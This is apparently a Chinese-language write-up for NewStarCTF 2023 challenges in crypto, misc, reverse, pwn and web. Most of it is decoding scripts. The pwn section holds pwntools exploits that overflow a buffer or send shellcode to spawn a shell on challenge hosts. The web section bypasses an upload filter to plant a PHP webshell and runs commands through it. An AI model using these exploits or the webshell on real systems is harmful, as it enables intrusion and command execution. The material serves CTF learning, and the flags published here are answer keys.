Crypto

Caesar’s Secret

img

flag

flag{ca3s4r's_c1pher_i5_v4ry_3azy}

Fence

img

flag

flag{reordering_the_plaintext#686f8c03}

brainfuck

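def shrinkBFCode(code):
    """Collapse ``+``/``-`` runs and drop pointer moves from a Brainfuck string.

    Every maximal run of ``+``/``-`` becomes a single ``+`` in the returned
    string whose net delta is recorded in ``cPos2Change``; ``>``/``<`` only
    move a virtual pointer and emit nothing.  Every emitted character gets
    the pointer position at that moment in ``cPos2Vars``.  Any other
    character (``[``, ``]``, ``.``, ``,`` and the custom ``%`` understood by
    ``generatePyCode``) is copied through unchanged.

    :param code: Brainfuck source string.
    :return: ``(shrunk_code, cPos2Vars, cPos2Change)``; both dicts are keyed
        by index into ``shrunk_code``.
    """
    cPos2Vars = {}    # index in nCode -> pointer position at that point
    cPos2Change = {}  # index of an emitted '+' -> net +/- delta of the run
    varPos = 0
    nCode = []
    incVal = 0
    lc = None
    dataChangeOp = {'+', '-'}

    def flush_run():
        # Emit the pending +/- run as one '+' carrying its net delta.
        cPos2Change[len(nCode)] = incVal
        cPos2Vars[len(nCode)] = varPos
        nCode.append('+')

    for c in code:
        if c not in dataChangeOp and lc in dataChangeOp:
            flush_run()
            incVal = 0
        if c == '>':
            varPos += 1
        elif c == '<':
            varPos -= 1
        elif c in dataChangeOp:
            incVal += 1 if c == '+' else -1
        else:
            cPos2Vars[len(nCode)] = varPos
            nCode.append(c)
        lc = c
    # A program ending in +/- never reaches the flush inside the loop; emit
    # the trailing run here so it is not silently dropped.
    if lc in dataChangeOp:
        flush_run()

    return ''.join(nCode), cPos2Vars, cPos2Change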

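def generatePyCode(shellCode, pVars, pChange):
    """Translate shrunk Brainfuck (output of ``shrinkBFCode``) into Python source.

    One statement per op over a ``data`` list (``+`` uses the delta recorded
    in ``pChange``; the cell index comes from ``pVars``).  Two patterns are
    folded: ``[-]`` becomes ``data[x] = 0``, and a flat loop (no nested ``[``,
    no ``%``) whose body only adds constants becomes straight-line
    ``data[y] += k*data[x]`` statements followed by ``data[x] = 0``.

    :param shellCode: shrunk program string.
    :param pVars: index in ``shellCode`` -> cell number; a missing index maps
        to itself.
    :param pChange: index of a ``+`` -> net delta; a missing index counts as 1.
    :return: the generated Python source, one statement per line.
    :raises Exception: when a ``]`` does not close a ``[`` (kept for
        compatibility with existing callers).
    """
    pyCodes = []
    bStacks = []          # open loops as ('[', index into shellCode)
    whileVarCache = {}    # '[' index -> {cell: net delta applied per iteration}

    def scaled(vChange, cVarChange):
        # Multiplier applied to the condition cell when a loop is unrolled.
        # Kept an int when it divides evenly so the generated arithmetic stays
        # integer (true division used to emit '2.0*data[0]').
        num, den = abs(vChange), abs(cVarChange)
        return num // den if num % den == 0 else num / den

    for i, c in enumerate(shellCode):
        d_pos = pVars.get(i, i)
        d_change = pChange.get(i, 1)
        indentLevel = len(bStacks)
        indentStr = ' ' * (4 * indentLevel)
        outerIndent = ' ' * (4 * (indentLevel - 1))
        if c == '[':
            pyCodes.append('{}while data[{}] != 0:'.format(indentStr, d_pos))
            bStacks.append((c, i))
            whileVarCache[i] = {}
        elif c == ']':
            if bStacks[-1][0] != '[':
                raise Exception('miss match of {}] found between {} and {}'.format(bStacks[-1][0], bStacks[-1][1], i))
            loopStart = bStacks[-1][1]
            cNum = i - loopStart
            if cNum == 2:
                # '[-]' (or '[+]'): drop the while header and its single body
                # line and emit a plain clear of the cell instead.
                del pyCodes[-2:]
                d_pos_l = pVars.get(i - 1, i - 1)
                pyCodes.append('{}data[{}] = 0'.format(outerIndent, d_pos_l))
            whileCode = shellCode[loopStart + 1 : i]
            d_pos_l = pVars.get(loopStart, loopStart)
            whileVars = whileVarCache[loopStart]
            cVarChange = whileVars.get(d_pos_l, 0)
            # Nested loops stay real while loops.  A loop that never changes
            # its own condition cell (cVarChange == 0) is also left as-is
            # instead of failing on the division in scaled().
            if cNum > 2 and '[' not in whileCode and '%' not in whileCode and cVarChange != 0:
                # Remove the loop body (every line at exactly indentStr), then
                # the while header itself.
                while pyCodes and pyCodes[-1].startswith(indentStr) and pyCodes[-1][len(indentStr)] != ' ':
                    pyCodes.pop()
                pyCodes.pop()
                for vPos, vChange in whileVars.items():
                    if vPos == d_pos_l:
                        continue
                    ctimes = scaled(vChange, cVarChange)
                    ctimesStr = '' if ctimes == 1 else '{}*'.format(ctimes)
                    cSign = '+' if vChange > 0 else '-'
                    pyCodes.append('{}data[{}] {}= {}data[{}]'.format(outerIndent, vPos, cSign, ctimesStr, d_pos_l))
                pyCodes.append('{}data[{}] = 0'.format(outerIndent, d_pos_l))
            del whileVarCache[loopStart]
            bStacks.pop()
        elif c == '.':
            pyCodes.append('{}print(data[{}])'.format(indentStr, d_pos))
        elif c == ',':
            pyCodes.append('{}data[{}] = ord(stdin.read(1))'.format(indentStr, d_pos))
        elif c in ('+', '-'):
            # '+' carries the run's net delta; a literal '-' (only present in
            # unshrunk input) negates it.
            delta = d_change if c == '+' else -d_change
            if c == '+':
                opSign = '-=' if d_change < 0 else '+='
            else:
                opSign = '+=' if d_change < 0 else '-='
            clearStmt = '{}data[{}] = 0'.format(indentStr, d_pos)
            if pyCodes and pyCodes[-1] == clearStmt:
                # "data[x] = 0" immediately followed by "+= k" folds to "= k".
                pyCodes[-1] = '{}data[{}] = {}'.format(indentStr, d_pos, delta)
            else:
                pyCodes.append('{}data[{}] {} {}'.format(indentStr, d_pos, opSign, abs(d_change)))
            if bStacks:
                loopVars = whileVarCache[bStacks[-1][1]]
                loopVars[d_pos] = loopVars.get(d_pos, 0) + delta
        elif c == '%':
            pyCodes.append('{}data[{}] %= data[{}]'.format(indentStr, d_pos, d_pos + 1))
    return '\n'.join(pyCodes)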

# Brainfuck program lifted from the challenge; it ends with '.', so every
# +/- run is flushed by shrinkBFCode before the output below is generated.
shellcode = "++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>++++++.>----.<-----.>-----.>-----.<<<-.>>++..<.>.++++++.....------.<.>.<<<<<+++.>>>>+.<<<+++++++.>>>+.<<<-------.>>>-.<<<+.+++++++.--..>>>>---.-.<<<<-.+++.>>>>.<<<<-------.+.>>>>>++."
shrinkCode, pVars, pChange = shrinkBFCode(shellcode)
# Prints the generated Python (the listing that follows in the writeup).
print(generatePyCode(shrinkCode, pVars, pChange))

解密得到

# Output of generatePyCode for the program above.  The "N.0*" coefficients
# come from the true division in its loop rewrite; read them as integer
# multiples (the writeup edits the output by hand before running it).
data[0] += 8
data[2] += 2.0*data[0]
data[3] += 4.0*data[0]
data[4] += 6.0*data[0]
data[5] += 8.0*data[0]
data[6] += 10.0*data[0]
data[7] += 12.0*data[0]
data[8] += 14.0*data[0]
data[9] += 16.0*data[0]
data[10] += 18.0*data[0]
data[11] += 20.0*data[0]
data[12] += 22.0*data[0]
data[13] += 24.0*data[0]
data[14] += 26.0*data[0]
data[15] += 28.0*data[0]
data[16] += 30.0*data[0]
data[0] = 0
data[7] += 6
print(data[7])
data[8] -= 4
print(data[8])
data[7] -= 5
print(data[7])
data[8] -= 5
print(data[8])
data[9] -= 5
print(data[9])
data[6] -= 1
print(data[6])
data[8] += 2
print(data[8])
print(data[8])
print(data[7])
print(data[8])
data[8] += 6
print(data[8])
print(data[8])
print(data[8])
print(data[8])
print(data[8])
data[8] -= 6
print(data[8])
print(data[7])
print(data[8])
data[3] += 3
print(data[3])
data[7] += 1
print(data[7])
data[4] += 7
print(data[4])
data[7] += 1
print(data[7])
data[4] -= 7
print(data[4])
data[7] -= 1
print(data[7])
data[4] += 1
print(data[4])
data[4] += 7
print(data[4])
data[4] -= 2
print(data[4])
print(data[4])
data[8] -= 3
print(data[8])
data[8] -= 1
print(data[8])
data[4] -= 1
print(data[4])
data[4] += 3
print(data[4])
print(data[8])
data[4] -= 7
print(data[4])
data[4] += 1
print(data[4])
data[9] += 2
print(data[9])

简单修改一下输出得到
img
或者CTF在线工具
img

flag

flag{Oiiaioooooiai#b7c0b1866fe58e12}

Vigenère

Vigenere Solver
img

flag

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}

babyrsa

from Crypto.Util.number import *
import binascii
import gmpy2
import rsa
from factordb.factordb import FactorDB
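n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
# Ask FactorDB for the factorisation of n (network call).  phi is built as
# prod(p - 1) over the returned list, which is only right when the factors
# are distinct primes -- the assumption this challenge relies on.
a = FactorDB(n)
a.connect()
fac = a.get_factor_list()
phi_n = 1
for p in fac:
    phi_n *= p - 1
d = gmpy2.invert(e, phi_n)
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
m = gmpy2.powmod(c, d, n)
# long_to_bytes (Crypto.Util.number, star-imported above) also handles an
# odd-length hex representation, which binascii.unhexlify(hex(m)[2:]) rejects.
print(long_to_bytes(m))
#flag{us4_s1ge_t0_cal_phI}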

flag

flag{us4_s1ge_t0_cal_phI}

babyxor

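enc = 'e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher_hex = list(bytes.fromhex(enc))   # same ints as slicing two hex chars at a time
#print(cipher_hex)


def xor_decode(cipher_bytes, key):
    """Return the text obtained by XOR-ing every value of *cipher_bytes* with the byte *key*."""
    return ''.join(chr(c ^ key) for c in cipher_bytes)


# range(256): the original stopped at 254 and could never try key 255.
for key in range(256):
    flag = xor_decode(cipher_hex, key)
    if 'flag' in flag:
        print(f'key={key}\n{flag}')
        break
#flag{x0r_15_symm3try_and_e4zy!!!!!!}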

flag

flag{x0r_15_symm3try_and_e4zy!!!!!!}

small d

n,e都很大,直接考虑维纳攻击
github上找个脚本

import math

import gmpy2
import libnum

def continuedFra(x, y):
    """Return the continued-fraction expansion of x/y as a list of partial quotients.

    :param x: numerator
    :param y: denominator
    :return: list of partial quotients (empty when y is 0)
    """
    quotients = []
    num, den = x, y
    while den:
        q, r = divmod(num, den)
        quotients.append(q)
        num, den = den, r
    return quotients
def gradualFra(cf):
    """Return the last convergent of the continued fraction *cf*.

    The pair comes back as (denominator, numerator): for cf == [2, 3] (7/3)
    the result is (3, 7).  wienerAttack unpacks it as (d, k) in that order.

    :param cf: list of partial quotients
    :return: (denominator, numerator) of the final convergent
    """
    lower, upper = 0, 1
    for q in reversed(cf):
        lower, upper = upper, q * upper + lower
    return lower, upper
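def solve_pq(a, b, c):
    """Solve a*x^2 + b*x + c = 0 over the integers (Vieta: x^2 - (p+q)*x + p*q = 0).

    :param a: coefficient of x^2
    :param b: coefficient of x
    :param c: constant term (p*q)
    :return: the two roots (p, q); exact only when the discriminant is a
        perfect square, so callers confirm with p*q == n
    :raises ValueError: when the discriminant is negative
    """
    # math.isqrt replaces gmpy2.isqrt: same integer square root, same
    # ValueError on a negative argument, no third-party dependency.
    root = math.isqrt(b * b - 4 * a * c)
    return (-b + root) // (2 * a), (-b - root) // (2 * a)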
def getGradualFra(cf):
    """Return every convergent of *cf* as gradualFra tuples, shortest prefix first.

    :param cf: list of partial quotients
    :return: list of (denominator, numerator) pairs, one per prefix of cf
    """
    return [gradualFra(cf[:k]) for k in range(1, len(cf) + 1)]


def wienerAttack(e, n):
    """Recover a small RSA private exponent d from (e, n) via Wiener's attack.

    Walks the convergents of e/n; a candidate (d, k) is accepted when
    k divides e*d - 1 and the implied phi gives integer p, q with p*q == n.

    :param e: public exponent
    :param n: modulus
    :return: the private exponent d, or None when no convergent works
    """
    for d, k in getGradualFra(continuedFra(e, n)):
        if k == 0 or (e * d - 1) % k:
            continue
        phi = (e * d - 1) // k
        p, q = solve_pq(1, n - phi + 1, n)
        if p * q == n:
            return d
    return None

# Challenge parameters: e is of the same size as n, which (as the note above
# says) is the cue for a small private exponent and hence Wiener's attack.
n= 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
e= 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
c= 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
# wienerAttack returns None when no convergent fits; pow() below would then fail.
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())   # libnum.n2s: int -> bytes
#flag{learn_some_continued_fraction_technique#dc16885c}
#flag{learn_some_continued_fraction_technique#dc16885c}

flag

flag{learn_some_continued_fraction_technique#dc16885c}

babyencoding

part 1 of flag: ZmxhZ3tkYXp6bGluZ19lbmNvZGluZyM0ZTBhZDQ=
part 2 of flag: MYYGGYJQHBSDCZJRMQYGMMJQMMYGGN3BMZSTIMRSMZSWCNY=
part 3 of flag: =8S4U,3DR8SDY,C`S-F5F-C(S,S<R-C`Q9F8S87T`

part 1 base64: flag{dazzling_encoding#4e0ad4
part 2 base32: f0ca08d1e1d0f10c0c7afe422fea7
part 3 uuencode: c55192c992036ef623372601ff3a}
img

flag

flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

Affine

仿射密码

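def egcd(a, b):
    """Extended Euclid: return (g, x, y) with g = gcd(a, b) and a*x + b*y == g."""
    if not a:
        return (b, 0, 1)
    gcd, coef_y, coef_x = egcd(b % a, a)
    quotient = b // a
    return (gcd, coef_x - quotient * coef_y, coef_y)


def modinv(a, m):
    """Return the inverse of *a* modulo *m*.

    :raises ValueError: when gcd(a, m) != 1, i.e. no inverse exists.  ValueError
        is an Exception subclass, so callers catching Exception keep working.
    """
    g, x, _ = egcd(a, m)
    if g != 1:
        raise ValueError('modular inverse does not exist')
    return x % m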

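modulus = 256
enc = bytes.fromhex(
    'dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064')
#print(enc)


def affine_decrypt(data, inv_a, b, mod=modulus):
    """Undo c = (a*m + b) % mod on every byte of *data*, given inv_a = a^-1 mod *mod*."""
    return bytes([(inv_a * (c - b)) % mod for c in data])


for key_0 in range(256):
    # Only multipliers coprime with 256 (the odd ones) have an inverse; modinv
    # raises for the others.  Catch Exception, not a bare except, so Ctrl-C
    # still stops the search.
    try:
        inv_key_0 = modinv(key_0, modulus)
    except Exception:
        continue

    for key_1 in range(256):
        decrypted = affine_decrypt(enc, inv_key_0, key_1)
        if b'flag{' in decrypted:
            print("Key found:", key_0, key_1)
            print("Decrypted flag:", decrypted)
#Key found: 17 23
#Decrypted flag: b'flag{4ff1ne_c1pher_i5_very_3azy}'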

flag

flag{4ff1ne_c1pher_i5_very_3azy}

babyaes

from Crypto.Cipher import AES
import os
from flag import flag
from Crypto.Util.number import *


def pad(data):
    """Right-pad *data* with NUL bytes to 16 bytes; longer input is returned unchanged."""
    missing = 16 - len(data)
    return data + b'\x00' * missing


def main():
    """Encrypt the padded flag under AES-CBC and print the key/iv hint plus the ciphertext."""
    padded = pad(flag)
    # The key is one 16-byte random block repeated: 32 bytes, 128 bits of entropy.
    half = os.urandom(16)
    key = half + half
    iv = os.urandom(16)
    # Hint line: key XOR iv XOR 1 as one integer.
    print(bytes_to_long(key) ^ bytes_to_long(iv) ^ 1)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    print(cipher.encrypt(padded))


if __name__ == "__main__":
    main()
# Recorded output of one run (key and iv come from os.urandom, so they differ per run):
# 3657491768215750635844958060963805125333761387746954618540958489914964573229
# b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'

搓个脚本

from Crypto.Cipher import AES
from Crypto.Util.number import *

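a = 3657491768215750635844958060963805125333761387746954618540958489914964573229
enc = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
# The challenge printed bytes_to_long(key) ^ bytes_to_long(iv) ^ 1; undo the ^ 1.
a = a ^ 1
#print(a)
print(long_to_bytes(a))
#_a = b'\x08 \x16 \x11 % \xa0 \xa6 \xc5 \xcb ^ \x02 \x99 N F ` \xea , \xeb L \x08 b \xc1 \x98 \xc2 \x07 \x8f \xa3 \xc1 O % q \xfc , '
# key is a 16-byte block repeated (os.urandom(16) * 2) and iv is 16 bytes, so
# the XOR only touches the low 16 bytes: the high 16 bytes of `a` are the key
# block itself and the low 16 bytes are key_block ^ iv.  Derive both instead
# of pasting them from the printed output.
key_iv = long_to_bytes(a, 32)
key_block = key_iv[:16]
iv = bytes(k ^ x for k, x in zip(key_block, key_iv[16:]))
key = key_block * 2
print(key)
print(iv)

aes = AES.new(key, AES.MODE_CBC, iv)
dec_flag = aes.decrypt(enc)
print(dec_flag)
# Recorded values (the original script printed the second line as the
# 32-byte int XOR; its last 16 bytes are the iv):
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xebL\x08b\xc1\x98\xc2\x07\x8f\xa3\xc1O%q\xfc,'
#b'\x08\x16\x11%\xa0\xa6\xc5\xcb^\x02\x99NF`\xea,\xe3Z\x19Ga>\x07\xcc\xd1\xa1X\x01c\x11\x16\x00'
#b'firsT_cry_Aes\x00\x00\x00'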

flag

flag{firsT_cry_Aes}

Misc

CyberChef’s Secret

img

flag

flag{Base_15_S0_Easy_^_^}

空白格

whitespace
img

flag

flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

机密图片

扫码的结果不对,应该有隐写
运用工具StegSolver
img
img

flag

flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

隐秘的眼睛

SilentEye直接梭
img

flag

flag{R0ck1ng_y0u_63b0dc13a591}

流量!鲨鱼!

wireshark打开,大略看一下http,200 OK包很可疑
img
img
Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=
应该是base64,base64一次看到熟悉的Zmxh,就猜到要再base64一次
img

flag

flag{Wri35h4rk_1s_u53ful_b72a609537e6}

压缩包们

修复文件头,修复成功后后缀名改成.zip解压
img
flag.zip提示损坏
img
继续修复
img
或者你如果是高贵的bandizip pro用户
img
注意到flag.zip内有一段base64密文
解密出来是I like six-digit numbers because they are very concise and easy to remember.
img
应该是提示flag.zip的解压密码是六位数字,密码232311
img

flag

flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}

Reverse

easy_RE

img
img

flag

flag{welc0me_to_rev3rse!!}

Segments

shift+F7
img
手动过滤一下,修改格式得到flag

flag

flag{You_ar3_g0od_at_f1nding_ELF_segments_name}

upx -d 脱壳
img

exp

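enc = 'gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~'
# Every character was shifted up by one code point; shift each back down.
flag = ''.join(chr(ord(ch) - 1) for ch in enc)
print(flag)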

flag

flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}

ELF

encode加密完标准base64
img
img
先把密文base64解码成hex
img

exp

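enc = [0x56, 0x5c, 0x51, 0x57, 0x6b, 0x74, 0x20, 0x8f, 0x24, 0x5f,
       0x65, 0x8f, 0x27, 0x5e, 0x5f, 0x67, 0x8f, 0x67, 0x58, 0x51,
       0x27, 0x8f, 0x75, 0x7c, 0x76, 0x8f, 0x21, 0x63, 0x2f, 0x6d]
# Decode: subtract 16, then XOR 0x20.  `i - 16 ^ 0x20` already parses as
# (i - 16) ^ 0x20 in Python; the parentheses just make the order explicit.
flag = ''.join(chr((i - 16) ^ 0x20) for i in enc)
print(flag)
#flag{D0_4ou_7now_wha7_ELF_1s?}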

flag

flag{D0_4ou_7now_wha7_ELF_1s?}

AndroXor

jadx打开,循环异或
img

exp

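enc = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']
key = 'happyx3'
key_ascii = [ord(char) for char in key]
# jadx renders the array with a mix of int and char literals; normalise each
# entry to its byte value before XOR-ing with the repeating key.  (The
# original silently reused a stale xor_result for an entry of any other type.)
flag = ''.join(
    chr((value if isinstance(value, int) else ord(value)) ^ key_ascii[i % len(key_ascii)])
    for i, value in enumerate(enc)
)
print(flag)
#flag{3z_And0r1d_X0r_x1x1}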

flag

flag{3z_And0r1d_X0r_x1x1}

Endian

还是循环异或,因为小端序,所以异或因子是[0x78,0x56,0x34,0x12]
img
shift+E提取出array
img

exp

enc = [
    0x1E, 0x3A, 0x55, 0x75, 0x03, 0x3A, 0x58, 0x7B, 0x0C, 0x22,
    0x58, 0x4D, 0x3D, 0x38, 0x50, 0x7B, 0x19, 0x38, 0x6B, 0x73,
    0x05]
# The 32-bit key 0x12345678 is applied in little-endian byte order (see the
# note above), so the XOR bytes repeat in this order.
key = [0x78,0x56,0x34,0x12]
flag = ''.join(chr(value ^ key[i % len(key)]) for i, value in enumerate(enc))
print(flag)
#flag{llittl_Endian_a}

flag

flag{llittl_Endian_a}

lazy_activity

非预期

img

正常解法

jadx打开有个flagactivity进程应该是点10000次出flag
img
打开模拟器app内提示’Where is my flag? Try to start another Activity.’
那就利用模拟器的adb工具

# Open a shell on the emulator through adb.
adb shell
# Become root first (the writeup does this before launching the activity).
su
# Start FlagActivity by component name, as the app's hint asks ("Try to start another Activity").
am start -n com.droidlearn.activity_travel/.FlagActivity

img
模拟器弹出这个界面
img
鼠标连点器或者写python脚本模拟点击就行
网上随便找的脚本

import pyautogui as pd
import time
pd.FAILSAFE = True  # pyautogui's fail-safe: slam the mouse into a screen corner to abort

time.sleep(3)
# 3 seconds to move the pointer yourself onto the button that must be clicked
pd.click(clicks=100000,interval=0.0001)
# pyautogui.click()
# (100,100, clicks=2,interval=0.5,button='right',duration=0.2)
# position, click count, interval between clicks, right button (default is left), move duration

img

flag

flag{Act1v1ty_!s_so00oo0o_Impor#an#}

EzPE

打不开,头文件被修改了
img
随便找个exe文件复制过来fix一下
img
简单的异或
img

exp

enc = [
    0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C,
    0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51,
    0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04,
    0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D]
# Walk from the second-to-last byte down to the first: each byte is XORed
# with its index and the byte after it, which has already been processed
# (the last byte is left untouched).
for i in range(len(enc) - 2, -1, -1):
    enc[i] ^= i ^ enc[i + 1]
flag = ''.join(map(chr, enc))
print(flag)
#flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

flag

flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

PWN

ret2text

栈溢出

exp

from pwn import *
p=remote("node4.buuoj.cn",25617)   # challenge instance
elf = ELF ('./ret2text')
backdoor = elf.symbols['backdoor']   # address of the binary's `backdoor` symbol
# 40 filler bytes (the offset from the writeup's stack analysis), then the
# address as 8 little-endian bytes -- p64 assumes a 64-bit build.
payload = b'a'*40+p64(backdoor)
p.sendline(payload)
p.interactive()

newstar_shop

看附件知道是个整型溢出
shop里面的money是unsigned int,无符号整数,但是don’t choose里面的money是int,有符号整数因此可以整数溢出,让他成为负数再返回购买。
依次输入1212313
img

ezshellcode

有个read
img
看看buf
img
直接传’\x90’ 全nop

from pwn import *

banary = "./ezshellcode"   # (sic) path of the challenge binary
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 25641
local = 0   # 1: run the binary locally, 0: talk to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

# shellcraft.sh() is assembled for the arch set in context(); 16 bytes of 0x90
# (0x8 + 8, from the writeup's look at buf) are sent ahead of it, as the note
# above describes.
sh = shellcraft.sh()
payload = b'\x90'*(0x8+8) + asm(sh)
io.send(payload)
io.interactive()

img

random

有个随机数,直接调用
img

from pwn import *

banary = "./pwn"   # (sic) path of the challenge binary
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26831
local = 0   # 1: run the binary locally, 0: talk to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

# Load the host libc through ctypes (cdll arrives with `from pwn import *`)
# and reproduce srand(time(0)); rand().  The value only matches if the
# service seeds the same way and both sides land in the same second.
clibc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
clibc.srand(clibc.time(0))
# NOTE(review): str is passed where newer pwntools releases expect bytes -- confirm with the installed version.
io.sendlineafter("number?\n",str(clibc.rand()))
io.interactive()

pieee

PIE保护
img
看看buf在栈中位置
img
传完buf 0x28个后直接跳到0x6c
img

from pwn import *

banary = "./pie"   # (sic) path of the challenge binary

elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 26955
local = 0   # 1: run the binary locally, 0: talk to the remote instance
if local:
    io = process(banary)
else:
    io = remote(ip, port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

# 0x28 filler bytes followed by the single byte 0x6c: only one byte past the
# buffer is written, per the writeup's stack layout above.
payload = b'a'*(0x28)+b'\x6c'
io.send(payload)
io.interactive()

img

web

ErrorFlask

随便传两个参数
http://236f6195-02b3-4823-a05d-a72a6fb2080a.node4.buuoj.cn:81/?number1={{%201+1%20}}&number2=1
img

flag

flag{Y0u_@re_3enset1ve_4bout_deb8g}

Begin of HTTP

提示用get方式传参,那就http://node4.buuoj.cn:28821/?ctf=1
img
提示用post 传 secret
img
F12看一下源码,找一下 secret
得到 secret=n3wst4rCTF2023g00000d
img
post 传一下
img
改一下cookie,改成ctfer
img
改 User-Agent 为 NewStarCTF2023
img
改Referer为 newstarctf.com
img
最后改一下请求头

POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:28821
Content-Length: 28
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node4.buuoj.cn:28821
Content-Type: application/x-www-form-urlencoded
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: newstarctf.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Connection: close
Client-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000d

img

泄露的秘密

找出泄露的敏感信息
访问 http://7dda953a-14dd-4219-bc4b-aee8b2ba0419.node4.buuoj.cn:81/www.zip
得到两个文件
robots.txt 和 index.php

PART ONE: flag{r0bots_1s_s0_us3ful
<?php
// Second half of the flag sits in the PHP source recovered from www.zip; the
// first half was in robots.txt (both files came out of the same archive).
$PART_TWO = "_4nd_www.zip_1s_s0_d4ng3rous}";
echo "<h1>粗心的管理员泄漏了一些敏感信息,请你找出他泄漏的两个敏感信息!</h1>";

flag

flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

前端有文件后缀名检测
img
直接在包中修改后缀名

POST / HTTP/1.1
Host: 56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Length: 308
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJDwfZKOoSI69Xzwk
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="file"; filename="webshell2.php"
Content-Type: image/png

<?=system($_GET[2]);
------WebKitFormBoundaryJDwfZKOoSI69Xzwk
Content-Disposition: form-data; name="submit"

Upload!!!
------WebKitFormBoundaryJDwfZKOoSI69Xzwk--

传完之后访问
http://56547911-1b50-4aed-a479-45190dd2be26.node4.buuoj.cn:81/upload/webshell2.php?2=tac%20/fl*
